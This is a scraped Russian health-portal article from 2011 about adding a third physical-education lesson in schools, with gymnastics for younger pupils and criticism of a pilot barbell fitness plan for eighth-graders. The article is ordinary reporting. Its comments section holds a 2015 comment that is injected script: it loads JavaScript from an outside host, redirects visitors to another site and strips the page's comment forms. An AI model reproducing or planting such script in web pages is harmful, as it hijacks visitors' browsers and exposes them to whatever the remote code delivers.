Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Фитнес на «пять»  >>  Фитнес на «пять»
 
Обратная связь
 

Фитнес на «пять»

Размер шрифта
31 августа 2011 07:05
  • google_analytics: false
  • Нравится

Блогосфера гудит, как растревоженный улей: в рунете опубликованы планы будущих уроков фитнеса, которые придут на смену физкультуре. Привычные кроссы и метание гранаты заменит гимнастика и упражнения со штангой.

1

Александр Тушкин / «Здоровье инфо»

Занятия физкультурой в школе – жалкое зрелище. Обычно девочкам и мальчикам приходится делить обшарпанный зал с одинокой шведской стенкой и парой канатов. В лучшем случае мальчики играют в футбол в одни ворота, а девочки просто болтают на скамейке. Если у школы есть два зала, то это не решает проблему – преподаватель-то один. А сдача нормативов – предлог для прогула: после очередного кросса школьники сбегают с занятий, так как от нагрузки болит все тело.

Уроки физкультуры в современном виде не нравятся никому: ни школьникам, которые приносят справки об освобождении, ни родителям, беспокоящимся о сохранности своих чад, ни руководству школы, которому надо впихнуть «физ-ру» в расписание. Концепция физкультуры в школе морально устарела – это признают большинство экспертов, как от спорта, так и от образования.

С 1 сентября российские школы ждет нововведение – третий урок физкультуры. Этот проект был утвержден президентом России Дмитрием Медведевым еще в январе прошлого года в рамках инициативы «Наша новая школа». К новому учебному году Минобрнауки разработало методические рекомендации. Чиновники советуют директорам учебных заведений разнообразить занятия: школы имеют право самостоятельно сделать выбор, чем дети будут заниматься в течение третьего часа «физ-ры»: плавать, кататься на роликах или... ходить на фитнес.

Гимнастическим снарядом по скучным урокам, огонь!

Соответствующее соглашение подписали министр образования и науки Андрей Фурсенко, президент Федерации фитнес-аэробики Ольга Слуцкер и президент Федерации художественной гимнастики Ирина Винер. Предполагается, что гимнасты подготовят программу занятий для младших классов, а фитнесом дети смогут заниматься только с 8 класса.

Программа для младших классов была внедрена и обкатана во многих странах мира специалистами Федерации еще 7 лет назад. Без соответствующего сертификата преподаватели не могут по этой программе учить детей гимнастике. Чтобы его получить, необходимо пройти программу переподготовки, которая будет частично финансироваться за счет бюджета. Если преподаватель физкультуры получит сертификат, чтобы вести уроки гимнастики в школе, ему полагается надбавка. Правда, ее размер не уточняется.

– Мы были у Фурсенко. Он сказал, что на модернизацию уроков физкультуры выделена какая-то дикая сумма – 20 млрд рублей (по другим сведениям, выделяется 120 млрд рублей – прим. автора). Большая часть этих трат должна уйти на кадры, ведь переобустраивать залы вообще не нужно. Для гимнастики подойдет обычный спортивный зал, самая простая шведская стенка и коврик, который можно купить в ближайшем супермаркете. А если занятия выполняются не на полу – больше можно вообще ничего не покупать. А всякие «железки» обычно дорогие и бесполезные, – рассказала на пресс-конференции в среду Ирина Винер.

 1

Заслуженный мастер спорта по художественной гимнастике, телеведущая Ляйсан Утяшева придерживается схожего мнения. По ее словам, гимнастика позволит детям с первого класса поставить хорошую базу и без всяких «железок». Если у них будет хорошая осанка, сильные мускулы и крепкие связки, то через несколько лет они смогут самостоятельно выбрать любой другой вид спорта, например, футбол или даже бокс. Кроме того, гимнастика позволит отбирать талантливых ребят в спортивные школы.

На пресс-конференции у журналистов была возможность ознакомиться с макетом методички по гимнастике для младших классов. Занятия будут напоминать, скорее, уроки ЛФК с некоторыми упражнениями из ритмической гимнастики: «Березка», «Гусеница». При этом Утяшева заверила «Здоровье инфо», что на уроках гимнастики никто никого насильно на шпагат сажать не будет. А нормативы вообще из школ уберут – в последнее время участились случаи гибели школьников во время кроссов. Последняя трагедия произошла в мае этого года – 16-летний парень из Омской области к концу километровой дистанции неожиданно потерял сознание и упал на беговой дорожке.

Пока проект находится в пилотной стадии. Он уже получил одобрение надзорных органов и был внедрен в двух московских школах – №16 и №721. Еще 29 школ стоят на очереди. А со следующего учебного года эта программа будет предложена для всех школ.

«Двойка» за штангу

Если гимнастика устраивает всех, то с фитнесом еще не все ясно. Блогер guglia выложила копию плана-конспекта урока фитнеса для учащихся 8 класса. В нем сказано, что мальчики для набора мышечной массы будут выполнять приседания, становую тягу и жим лежа – то есть весь пауэрлифтерский набор. Причем в методичке указано, что становая тяга должна выполняться на прямых ногах, хотя такой вариант упражнения считается более травмоопасным, чем классическая тяга.

– В мое время физ-ра сводилась к пробежке на лыжах или еще какой бурной деятельности того же рода, последующей простуде и двум неделям освобождения. А теперь вот такой урок физической радости запросто может закончиться травмой и освобождением от физкультуры на всю жизнь, – возмущается блогер.

Неизвестно, как такие занятия смогли получить одобрение у педиатров, которые считают, что с отягощениями нельзя заниматься до 16-18 лет, чтобы не нарушить рост скелета. Чтобы избежать этого, разработчики программы включили после упражнений со штангой подтягивания на перекладине. Впрочем, это вряд ли сможет компенсировать вред от компрессионных нагрузок на позвоночник восьмиклассника. Утяшева также разделила сомнения «Здоровье инфо» в пользе подобных тренировок для детей.

Успокаивает только одно – пока это только пилотный проект. Даже если он понравится Минобрнауки, родители все равно смогут сами выбрать, как их дети должны провести третий час физкультуры.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.